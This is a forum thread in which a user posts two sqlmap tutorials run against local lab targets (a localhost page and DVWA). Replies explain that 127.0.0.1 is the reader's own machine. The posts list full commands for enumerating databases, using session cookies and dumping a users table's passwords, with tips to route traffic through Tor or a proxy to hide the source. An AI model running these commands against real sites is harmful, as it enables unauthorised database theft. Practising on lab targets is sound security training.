SqlMap
Sql Injection Tool part 1
OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1
Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump
Video
http://www.youtube.com/watch?v=BDI0t1gBUMA
SqlMap + Live Http Headers Addon
Sql Injection Tool part 2
OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/
I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' --dbs
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump
Video
http://youtu.be/4Dg0ODJBZxM
+1
Thanks for demostration!
ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?
I did try few times but no luck.
Tx
Not Found
The requested URL /SQLInjection/injection.php was not found on this server.
Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.
V3nD3774 :o
Try:ping 127.0.0.1If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has alredy provided your data to a cybercrime investigation agency.
In this case a successful solution could be:less /etc/hosts also sudo ifconfig lo or if it's not enough try this (http://en.wikipedia.org/wiki/Localhost).
Good luck!
QuoteZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?
When you need to find path for files use whereis or find command. Let's say you want to find injection.php file in your system, you can use from terminal:
find / -name injection.php
How to use find command:
Cheers !
Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking how to find a file in my machine...rather was asking whether the link : 127.0.0.1/SQLInjection/injection.php?id=1 it is still a valid link...this because when i try to reach this link i just get the following message:
Not Found
The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80
I will not even comment re b4d_bl0ck post...it is quite hilarious to say the least (...and maybe has alredy provided your data to a cybercrime investigation agency)...
Tx again,
~V
V3nD3774, sorry for my irony, i didn't want to offend you.
I just wanted encurage you to read, before getting hands on things... and i guess you didn't visit the link i provided you. :)
What i was trying to explain you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app by his own hands or downloaded it, and put it in his server, ready to be exploited.
The URL will never be a valid link to you, until you do the same and put in your server a page with the same path and name. That's not an internet resource, but a local one, so it ha no sense asking others if it's a valid link or not... ;)
Sorry for having joked in the first reply.
Have fun!
tx b4d_bl0ck, now it is clearer.